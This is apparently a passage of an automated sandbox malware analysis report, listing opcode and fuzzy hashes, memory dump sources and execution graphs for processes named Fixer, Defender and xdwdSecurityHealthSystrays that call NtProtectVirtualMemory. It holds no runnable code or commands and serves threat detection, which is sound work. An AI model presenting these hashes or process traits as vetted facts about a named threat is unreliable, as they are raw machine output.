                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4|q$Hq$Hq$Hq$Hq
                                                                                                                                                                                                                                                • API String ID: 0-2385035612
                                                                                                                                                                                                                                                • Opcode ID: 54330fef155eff867c620f1d5abd775f9f732f970c49ca4ae18653ae752af768
                                                                                                                                                                                                                                                • Instruction ID: d98d2968113ddfc6fa0cb995d4756643ea386cbf94702de842c7e88049bce4b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54330fef155eff867c620f1d5abd775f9f732f970c49ca4ae18653ae752af768
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1682BF70B202298FDB59DF79C8546AEBBF6BF88300F148069E849EB355DB749D41CB90
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Hq
                                                                                                                                                                                                                                                • API String ID: 0-1594803414
                                                                                                                                                                                                                                                • Opcode ID: 6f94b1d877bfd4c4702eb4c996f623043802cb49f3604374120ddb7d1dc142c3
                                                                                                                                                                                                                                                • Instruction ID: e62ed8ad883452a9542e2b55752d7d01f1f470d8fb8bc13c3ff0cbb07f461fd1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f94b1d877bfd4c4702eb4c996f623043802cb49f3604374120ddb7d1dc142c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E561E8B1D102298FEB54CFAAC844BEEFBF2BF48300F1485A9D458A7255D7745A86CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9a2a0b9766b4e98435e573e2760f8a169325bf459134e85647e5eebfeb907cb9
                                                                                                                                                                                                                                                • Instruction ID: 0bdd5078281282a37563b4d55cec6e574c078a094290d6ed84598a99fc37348c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2a0b9766b4e98435e573e2760f8a169325bf459134e85647e5eebfeb907cb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60A2D4B4E102298FDB64DF68C984BDDB7B2BF49300F5482A9D849A7355DB70AE85CF40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4c3ef8a987f7258a3f52431db54bc8536403a108939e7e06c0752946b3d11736
                                                                                                                                                                                                                                                • Instruction ID: 9adc2d21d5a77036c2351728480c7579cbd3cc4ff1afc4f4952bd5c6c3b4ef32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c3ef8a987f7258a3f52431db54bc8536403a108939e7e06c0752946b3d11736
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B925E74A106298FD754DF68C991B6EB7B2FF88300F55C1A9C509AB38AC734E981DF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c811855f728092ef8ae7cfdf5dedc8cf8b86e1a7b4d76a4a0dcd1c149f8bc831
                                                                                                                                                                                                                                                • Instruction ID: 330591bb2537f45cb0ae1d57a73592fc0452438624051299ec09dcaa1ce1ad72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c811855f728092ef8ae7cfdf5dedc8cf8b86e1a7b4d76a4a0dcd1c149f8bc831
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A324D74A105298FD754DF68C991BAEB7B2FF88300F55C1AAC509AB386C734E981CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52617870854.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2e57a26e3d01ff2388846f566837c74f391ce7dd6de1a00d035fe5bcc1010133
                                                                                                                                                                                                                                                • Instruction ID: 1c9af6f682e9912c0f7f712c91e497b256ff35e4d71cc645c23e45414c337760
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e57a26e3d01ff2388846f566837c74f391ce7dd6de1a00d035fe5bcc1010133
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEE1C674E11228DFEB64CFA4C884B9DBBB2FF49310F2481A9D809A7355D774A985CF50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.52600268066.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_29c0000_Fixer.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7384fc5dd2e867af60f70f90e1e4b61cd3e87ba69ecab0eb7d967945906e656b
                                                                                                                                                                                                                                                • Instruction ID: b7557b1784d627821258673663ffb731cd6d47aed999bee99645a16261057889
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7384fc5dd2e867af60f70f90e1e4b61cd3e87ba69ecab0eb7d967945906e656b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0A17D32E002098FCF05DFA4C4445AEBBB7FF85300B25856EE905AB261DB75D946CF91

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:41.7%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 10774 7ffa1b3d23d7 10777 7ffa1b3d2351 10774->10777 10775 7ffa1b3d235a 10776 7ffa1b3d2604 NtProtectVirtualMemory 10778 7ffa1b3d2645 10776->10778 10777->10775 10777->10776 10766 7ffa1b3d223a 10769 7ffa1b3cd080 10766->10769 10768 7ffa1b3d2245 10771 7ffa1b3d2320 10769->10771 10770 7ffa1b3d235a 10770->10768 10771->10770 10772 7ffa1b3d2604 NtProtectVirtualMemory 10771->10772 10773 7ffa1b3d2645 10772->10773 10773->10768

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.52857475635.00007FFA1B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffa1b3c0000_6z9uno0baqvej0me.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:13.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 10868 7ffa1b3e17cd 10869 7ffa1b3e1831 NtProtectVirtualMemory 10868->10869 10871 7ffa1b3e18b5 10869->10871

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 632 7ffa1b3e17cd-7ffa1b3e18b3 NtProtectVirtualMemory 636 7ffa1b3e18b5 632->636 637 7ffa1b3e18bb-7ffa1b3e18e6 632->637 636->637
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.52864145112.00007FFA1B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffa1b3d0000_FixerNerest.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 12574 7ffa1b3b23d7 12578 7ffa1b3b2351 12574->12578 12575 7ffa1b3b235a 12576 7ffa1b3b2604 NtProtectVirtualMemory 12577 7ffa1b3b2645 12576->12577 12578->12575 12578->12576 12566 7ffa1b3b223a 12569 7ffa1b3ad080 12566->12569 12568 7ffa1b3b2245 12571 7ffa1b3b2320 12569->12571 12570 7ffa1b3b235a 12570->12568 12571->12570 12572 7ffa1b3b2604 NtProtectVirtualMemory 12571->12572 12573 7ffa1b3b2645 12572->12573 12573->12568

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.52884034744.00007FFA1B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffa1b3a0000_xdwdSecurityHealthSystrays.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 9606 7ffa1b3b23d7 9609 7ffa1b3b2351 9606->9609 9607 7ffa1b3b235a 9608 7ffa1b3b2604 NtProtectVirtualMemory 9610 7ffa1b3b2645 9608->9610 9609->9607 9609->9608 9598 7ffa1b3b223a 9601 7ffa1b3ad080 9598->9601 9600 7ffa1b3b2245 9603 7ffa1b3b2320 9601->9603 9602 7ffa1b3b235a 9602->9600 9603->9602 9604 7ffa1b3b2604 NtProtectVirtualMemory 9603->9604 9605 7ffa1b3b2645 9604->9605 9605->9600

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000013.00000002.52898691162.00007FFA1B3A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A4000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ffa1b3a4000_xdwdSecurityHealthSystrays.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 9544 7ffa1b3d17cd 9545 7ffa1b3d17df NtProtectVirtualMemory 9544->9545 9547 7ffa1b3d18b5 9545->9547

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 237 7ffa1b3d17cd-7ffa1b3d18b3 NtProtectVirtualMemory 242 7ffa1b3d18b5 237->242 243 7ffa1b3d18bb-7ffa1b3d18e6 237->243 242->243
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000014.00000002.53605210794.00007FFA1B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ffa1b3c0000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:14.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 10519 7ffa1b3b23d7 10521 7ffa1b3b2351 10519->10521 10520 7ffa1b3b235a 10521->10520 10522 7ffa1b3b2604 NtProtectVirtualMemory 10521->10522 10523 7ffa1b3b2645 10522->10523 10511 7ffa1b3b223a 10514 7ffa1b3ad080 10511->10514 10513 7ffa1b3b2245 10516 7ffa1b3b2320 10514->10516 10515 7ffa1b3b235a 10515->10513 10516->10515 10517 7ffa1b3b2604 NtProtectVirtualMemory 10516->10517 10518 7ffa1b3b2645 10517->10518 10518->10513

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000015.00000002.52911652813.00007FFA1B3A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A4000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffa1b3a4000_xdwdSecurityHealthSystrays.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:13.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 8134 7ffa1b3a17cd 8135 7ffa1b3a17df NtProtectVirtualMemory 8134->8135 8137 7ffa1b3a18b5 8135->8137

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 255 7ffa1b3a17cd-7ffa1b3a18b3 NtProtectVirtualMemory 260 7ffa1b3a18b5 255->260 261 7ffa1b3a18bb-7ffa1b3a18e6 255->261 260->261
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000016.00000002.52930450702.00007FFA1B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B390000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_7ffa1b390000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:10.3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                                                                                execution_graph 16426 7ffa1b3e23d7 16430 7ffa1b3e2351 16426->16430 16427 7ffa1b3e235a 16428 7ffa1b3e2604 NtProtectVirtualMemory 16429 7ffa1b3e2645 16428->16429 16430->16427 16430->16428 16418 7ffa1b3e223a 16421 7ffa1b3dd080 16418->16421 16420 7ffa1b3e2245 16423 7ffa1b3e2320 16421->16423 16422 7ffa1b3e235a 16422->16420 16423->16422 16424 7ffa1b3e2604 NtProtectVirtualMemory 16423->16424 16425 7ffa1b3e2645 16424->16425 16425->16420

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000017.00000002.53457988545.00007FFA1B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_23_2_7ffa1b3d0000_xdwdSecurityHealthSystrays.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:11.8%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 10261 7ffa1b3b17cd 10262 7ffa1b3b17df NtProtectVirtualMemory 10261->10262 10264 7ffa1b3b18b5 10262->10264

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 472 7ffa1b3b17cd-7ffa1b3b18b3 NtProtectVirtualMemory 477 7ffa1b3b18b5 472->477 478 7ffa1b3b18bb-7ffa1b3b18e6 472->478 477->478
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000018.00000002.53453095931.00007FFA1B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA1B3A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_7ffa1b3a0000_Defender.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2706961497-0